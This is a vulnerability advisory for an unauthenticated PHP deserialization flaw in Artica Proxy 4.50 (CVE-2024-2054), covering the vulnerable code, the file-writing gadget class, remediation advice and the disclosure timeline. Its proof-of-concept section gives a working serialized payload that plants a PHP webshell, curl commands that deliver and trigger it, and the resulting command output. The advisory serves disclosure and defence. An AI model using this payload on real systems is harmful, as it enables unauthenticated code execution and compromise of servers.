## https://sploitus.com/exploit?id=1337DAY-ID-39425
Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
Advisory ID: KL-001-2024-002
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt
1. Vulnerability Details
Affected Vendor: Artica
Affected Product: Artica Proxy
Affected Version: 4.50
Platform: Debian 10 LTS
CWE Classification: CWE-502 Deserialization of Untrusted Data
CVE ID: CVE-2024-2054
2. Vulnerability Description
The Artica Proxy administrative web application will deserialize
arbitrary PHP objects supplied by unauthenticated users and
subsequently enable code execution as the "www-data" user.
3. Technical Description
Prior to authentication, a user can send an HTTP request
to the "/wizard/wiz.wizard.progress.php" endpoint. This
endpoint processes the "build-js" query parameter by base64
decoding the provided value and then calling the "unserialize"
PHP function with the decoded value as input.
Code snippet from "wiz.wizard.progress.php":
if(isset($_GET["build-js"])){buildjs();exit;}
...
$ARRAY=unserialize(base64_decode($_GET["build-js"]));
To exploit this vulnerability, a user can leverage the
installed "Net_DNS2" library autoloader to instantiate the
"Net_DNS2_Cache_File" class. The "__destruct" method
within this class will write to arbitrary files defined
by the class:
public function __destruct()
{
//
// if there's no cache file set, then there's nothing to do
//
if (strlen($this->cache_file) == 0) {
return;
}
//
// open the file for reading/writing
//
$fp = fopen($this->cache_file, 'a+');
if ($fp !== false) {
...
if (!is_null($data)) {
//
// write the file contents
//
fwrite($fp, $data);
}
An unauthenticated user can overwrite existing files and
insert a webshell to execute malicious PHP as the "www-data"
user.
4. Mitigation and Remediation Recommendation
No response from vendor. This vulnerability can be remediated
by deleting the 'usr/share/artica-postfix/wizard' directory
if it is not needed. Otherwise, move it to a location outside
of the web root.
5. Credit
This vulnerability was discovered by Jaggar Henry of KoreLogic,
Inc.
6. Disclosure Timeline
2023.12.18 - KoreLogic requests vulnerability contact and
secure communication method from Artica.
2023.12.18 - Artica Support issues automated ticket #1703011342
promising follow-up from a human.
2024.01.10 - KoreLogic again requests vulnerability contact and
secure communication method from Artica.
2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
mail.articatech.com with response
"Client host rejected: Go Away!"
2024.01.11 - KoreLogic requests vulnerability contact and
secure communication method via
https://www.articatech.com/ 'Contact Us' web form.
2024.01.23 - KoreLogic requests CVE from MITRE.
2024.01.23 - MITRE issues automated ticket #1591692 promising
follow-up from a human.
2024.02.01 - 30 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.06 - KoreLogic requests update on CVE from MITRE.
2024.02.15 - KoreLogic requests update on CVE from MITRE.
2024.02.22 - KoreLogic reaches out to alternate CNA for
CVE identifiers.
2024.02.26 - 45 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.29 - Vulnerability details presented to AHA!
(takeonme.org) by proxy.
2024.03.01 - AHA! issues CVE-2024-2054 to track this
vulnerability.
2024.03.05 - KoreLogic public disclosure.
7. Proof of Concept
To overwrite the "wiz.upload.php" file to contain a PHP
webshell, the following serialized object can be base64
encoded and submitted via the "build-js" query parameter:
O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php
system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}
$ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k
"$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d"
&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";
{"uid=33(www-data) gid=33(www-data) groups=33(www-data)
":{"cache_date":1696883506,"ttl":8303116493}}
The contents of this advisory are copyright(c) 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/